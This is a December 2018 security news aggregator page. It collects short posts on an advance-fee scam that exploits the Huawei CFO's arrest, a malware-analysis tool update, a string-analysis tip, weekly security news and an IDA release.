Security Posts

Infocon: green

ISC Stormcast For Monday, December 10th 2018 https://isc.sans.edu/podcastdetail.html?id=6286
Categories: Security Posts

Nominated for the IT Blog Awards

/dev/random - 1 hour 37 min ago
This morning, I received a mail from Cisco to tell me that I’ve been nominated as finalist for their IT Blog Awards (Category: “Most Inspirational”). I’m maintaining this blog just for the fun and to share useful (I hope) information with my readers and don’t do this to get rewards but it’s always nice to get such feedback. The final competition is now open, if you’ve a few minutes, just vote for me! Votes are open here. Thank you! [The post Nominated for the IT Blog Awards has been first published on /dev/random]
Categories: Security Posts

Network Security Resilience – What Is It?

BreakingPoint Labs Blog - 3 hours 2 min ago
In a recent webinar, Best Practices for Security Resilience, Jon Oltsik (an analyst from ESG…
Categories: Security Posts

Building a data lake? Tips for advanced data analysis.

BreakingPoint Labs Blog - 3 hours 2 min ago
Data can now be collected from nearly every corner of an organization’s operation and mined to…
Categories: Security Posts

Ixia at SC18

BreakingPoint Labs Blog - 3 hours 2 min ago
Ixia has maintained a lasting presence at the annual Supercomputing Conference (SC18 this year).…
Categories: Security Posts

SNMP: The ABCs of Network Visibility

BreakingPoint Labs Blog - 3 hours 2 min ago
Network management and monitoring is a large topic. It includes device monioring and management,…
Categories: Security Posts

Are your IPsec Tunnels Misbehaving?

BreakingPoint Labs Blog - 3 hours 2 min ago
In one of my previous blog posts, I was emphasizing the fact that IPsec is not going away anytime…
Categories: Security Posts

Zero Touch Programming – How to Decrease Monitoring Equipment Programming Time

BreakingPoint Labs Blog - 3 hours 2 min ago
One of the key factors of any IT purchase is the usability of the product or solution. In fact,…
Categories: Security Posts

Using public cloud? Why you need cloud visibility.

BreakingPoint Labs Blog - 3 hours 2 min ago
Public cloud usage is widespread in enterprises and public sector environments worldwide. The most…
Categories: Security Posts

SCADA and Secure Infrastructure

BreakingPoint Labs Blog - 3 hours 2 min ago
Recently Chuck McAuley wrote on how his father taught him how to “think sideways” or maintain a…
Categories: Security Posts

Does cloud computing threaten our critical infrastructure?

BreakingPoint Labs Blog - 3 hours 2 min ago
Around the globe, advanced technology is now essential to the development and operation of…
Categories: Security Posts

Prevent DDoS Attacks from IoT Devices on Critical Infrastructure with These 4 Tips

BreakingPoint Labs Blog - 3 hours 2 min ago
On April 9, 2009, an act of sabotage on an underground fiber optic cable in my small town brought…
Categories: Security Posts

ISC Stormcast For Monday, December 10th 2018 https://isc.sans.edu/podcastdetail.html?id=6286, (Mon, Dec 10th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security Posts

Arrest of Huawei CFO Inspires Advance Fee Scam, (Sun, Dec 9th)

Last week, the arrest of MENG Wanzou made big waves in the news. Ms. Meng was arrested in Canada based on an arrest warrant issued for the United States Department of justice. Ms. Meng, as CFO of Huawei and possible heir to her father, the CEO of Huawei, is assumed to have access to substantial wealth. This led to a wave of advanced fee scams levering this news.  Advance fee scams have probably been most commonly associated with "Nigerian Prince" scams. The trick is to promise substantial wealth in exchange for a relatively small advanced fee. In this case, the message sent via WeChat suggested that a corrupt Canadian guard would let Ms. Meng escape for a few thousand dollars. The recipient of the message is asked to transfer the money to the guard's account, and promised a large amount of money once Ms. Meng is released: Translation: "Hello, I am MENG Wanzou. Currently, I have been detained by Canadian customs. I have limited use of my phone. Right now CIA is trying to get me into the hands of the US government. I bribed the guard of my room, and urgently need US$2000 to get out of here. Once I am out, I will reward you 200,000 shares of Huawei.  I will be good on my word. if you are single, we can also discuss the important thing in life. The guard’s name is David, the account number is 52836153836252, swift 55789034. I will be good on my word" Of course, it is questionable how successful a crude attempt like this will be. But sadly, experience tells us that there are still people falling for the old "Nigerian scam". By targeting Chinese individuals via WeChat, the scam may have a higher success rate than more widely distributed scams. ---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
Twitter| (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security Posts

Update: rtfdump.py Version 0.0.9

Didier Stevens - 8 hours 48 min ago
This new version (actually, 0.0.8 and 0.0.9) brings the following changes: All items can be selected now with -s a. A warning is displayed when option -s (selecting) does not result in the selection of an item. Option -A does a run-length encoded ASCII dump (cfr. -a). JSON output is possible with option –jsonoutput. Ad-hoc YARA rules can now also be hexadecimal (#x#) or regular expression (#r#). And offsets in a cut expression can now be hexadecimal too (prefix 0x). rtfdump_V0_0_9.zip (https)
MD5: 26BE358EC8D42BB7532B6C0C1EBAD1F2
SHA256: 3F6410AC7880116CDDE4480367D3F5AA534CCA3047B75FEA0F4BA1F5EAA97B07
Categories: Security Posts

Quickie: String Analysis is Still Useful, (Sun, Dec 9th)

SANS Internet Storm Center, InfoCON: green - Mon, 2018/12/10 - 00:52
String analysis: extracting and analyzing strings from binary files (like executables) to assist with reverse engineering. It's a simple method, but still useful, if you don't have to spend hours sifting through all strings produced by the string tool. I have a tip to quickly find "interesting" strings: sort the output of the strings tool by string length. Start with the shortest strings, and end with the longest strings. Take for example the analysis of a malicious document, that involved many steps and requires good knowledge of different file formats. Just by extracting the strings of this document and sorting them by length, you immediately find the powershell command: I developed my own strings.py tool, and option -L sorts strings by increasing lenght. Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security Posts

Things I Hearted This Week, 7th December 2018

AlienVault Blogs - Fri, 2018/12/07 - 16:00
It’s December, so you’re either on holiday, wishing you were on holiday, or hoping the next security article you read isn’t related to predictions. Well, I can’t help you with the holidays, but I can promise there will be no predictions here. It’s just good old-fashioned news of the juiciest news that made my heart flutter US Postal Service Ah, the good old USPS was running a weakness that allowed anyone who has an account to view details of around 60 million users, and in some cases modify the account details on their behalf. Luckily, a security researcher spotted the error about a year ago and notified USPS. Unluckily, the USPS didn’t respond to the researcher or fix the issue. Luckily, the researcher reached out to little known cyber-reporter by the name of Brian Krebs who contacted USPS and lo-behold a miracle happened and the issue was fixed in 48 hours! This raises the question as to is there anything lesser-known researchers who don’t have the public profile of Brian Krebs can do to help companies fix issues outside of a formally defined bug bounty program? Back in September, Troy Hunt posted on the very topic on the effectiveness of publicly shaming bad security. And not to say I agree with shaming companies, but when you look at instances like USPS, you do wonder if there is a better way. GCHQ Reveals it Doesn't Always Tell Firms if Their Software is Vulnerable to Cyber Attacks In other words, spy agency keeps secrets. There are four reasons given as to why GCHQ may not disclose flaws, being:
  1. There is no way to fix it
  2. The product is no longer supported
  3. The product is so poorly designed it can never be secure
  4. There is an overriding intelligence requirement that cannot be fulfilled in any other way
I particularly like number 4 as the catch-all clause. You could say there’s an overriding intelligence requirement to almost anything, and refuse to release any details under secrecy laws. I’m not necessarily bashing GCHQ, governments have been known for stockpiling exploits. They have a particular mission and objective, and this is how they go about fulfilling it. However, it does mean companies should not rely solely on GCHQ or other government agencies for their threat intelligence. Rather, building its own capabilities and threat sharing channels remain necessary. Scamming the Scammers I don’t think there are many stories more satisfying than when scammers get taken for a ride. This time courtesy of Hacker Fantastic who got contacted by the famous singer Rhianna out of the blue to help her get some money. ENISA Releases Online NIS Directive Tool ENISA released an interactive tool showing the relevant national laws and regulations, and per sector and subsector the national authorities supervising the NIS Directive. It’s pretty cool. Open Source Intelligence: A Key Under The Proverbial Mat In an age when everyone is connected, many businesses are forced to interact with the public via the internet. People are carrying small computers (phones) in their pockets with more homes having computers than generations before us. According to the U.S. Census Bureau's 2015 Computer and Internet Use in the United States: American Community Survey Reports, "Among all households, 78 percent had a desktop or laptop, 75 percent had a handheld computer such as a smartphone or other handheld wireless computer, and 77 percent had a broadband Internet subscription." Why Security Firms Do Not Share The Cost Of Bad Reputation After A Cyberattack? The whole security story looks as if it were a play where at the beginning both customer and security firm share the publicity lights when they sign a contract, but soon the lights turn off, the disaster strikes and it turns into a one-act play. This is where I agree that more transparency is needed, and insurance or warranties can go a long way to help in this regard. Related to infosec warranties On The Insecurity of Math.Random and it’s Siblings During code reviews we often see developers using weak RNGs like math.random() to generate cryptographic secrets. We think it is commonly known that weak random number generators (RNG) must not be used for any kind of secret and recommend using secure alternatives. I explicitly did not state a specific language yet, because basically every language offers both weak and strong RNGs. So I asked myself: What if I use a weak RNG to generate a secret? Is it possible to recover the secret from some derived value, like a hash? Why Hospitals Are The Next Frontier of Cybersecurity Hospital cybersecurity is a pressing problem with unique challenges and incalculable stakes. The healthcare industry’s accelerating adoption of sophisticated networks, connected devices and digital records has revolutionized clinical operations and patient care but has also left modern hospitals acutely vulnerable to cyber attack. Recent high-profile hacks have brought these mounting threats sharply into focus. However, despite increasing efforts and awareness, a number of technological, cultural and regulatory issues complicate healthcare cybersecurity. Other Things I Liked
Categories: Security Posts

IDA 7.2 – The Mac Rundown

Hex blog - Wed, 2018/11/28 - 17:19
We posted an addendum to the release notes for IDA 7.2: The Mac Rundown. It dives much deeper into the Mac-specific features introduced in 7.2, and should be great reference material for users interested in reversing the latest Apple binaries. It’s packed full of hints, tricks, and workarounds. We hope you will find it quite … Continue reading IDA 7.2 – The Mac Rundown
Categories: Security Posts

Pattern Welding Explained as Wearable Art

Niels Provos - Tue, 2018/08/28 - 06:37

Pattern-Welding was used throughout the Viking-age to imbue swords with intricate patterns that were associated with mystical qualities. This visualization shows the pattern progression in a twisted road with increasing removal of material. It took me two years of intermittent work to get to this image. I liked this image so much that I ordered it for myself as a t-shirt and am looking forward for people asking me what the image is all about. If you want to get a t-shirt yourself, you can order this design via RedBubble. If you end up ordering a t-shirt, let me know if it ends up getting you into any interesting conversations!

Categories: Security Posts

Thu, 1970/01/01 - 02:00
Syndicate content